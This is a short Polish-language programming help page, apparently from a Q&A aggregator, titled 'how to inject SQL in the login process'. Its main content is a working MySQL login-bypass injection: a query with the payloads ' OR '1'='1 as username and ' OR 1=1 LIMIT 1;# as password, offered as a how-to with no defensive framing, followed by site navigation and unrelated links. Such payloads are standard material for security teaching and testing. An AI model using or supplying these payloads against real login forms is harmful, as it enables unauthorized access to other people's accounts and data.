Mysql
 sql >> Baza danych >  >> RDS >> Mysql

jak wstrzyknąć sql w procesie logowania

Zaczynając od zapytania o cel:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Otrzymujemy nazwę użytkownika ' OR '1'='1 a hasło to ' OR 1=1 LIMIT 1;#



  1. Database
  2.   
  3. Mysql
  4.   
  5. Oracle
  6.   
  7. Sqlserver
  8.   
  9. PostgreSQL
  10.   
  11. Access
  12.   
  13. SQLite
  14.   
  15. MariaDB
  1. docker compose:odmowa połączenia Spring Boot z bazą danych mysql

  2. MySQLi nie może przygotować oświadczenia

  3. Problem z generowaniem plików PDF w PHP

  4. Leniwe pobieranie pojedynczej kolumny (atrybut klasy) z Hibernate

  5. Jak obliczyć miesięcznych aktywnych użytkowników (MAU) w MySQL?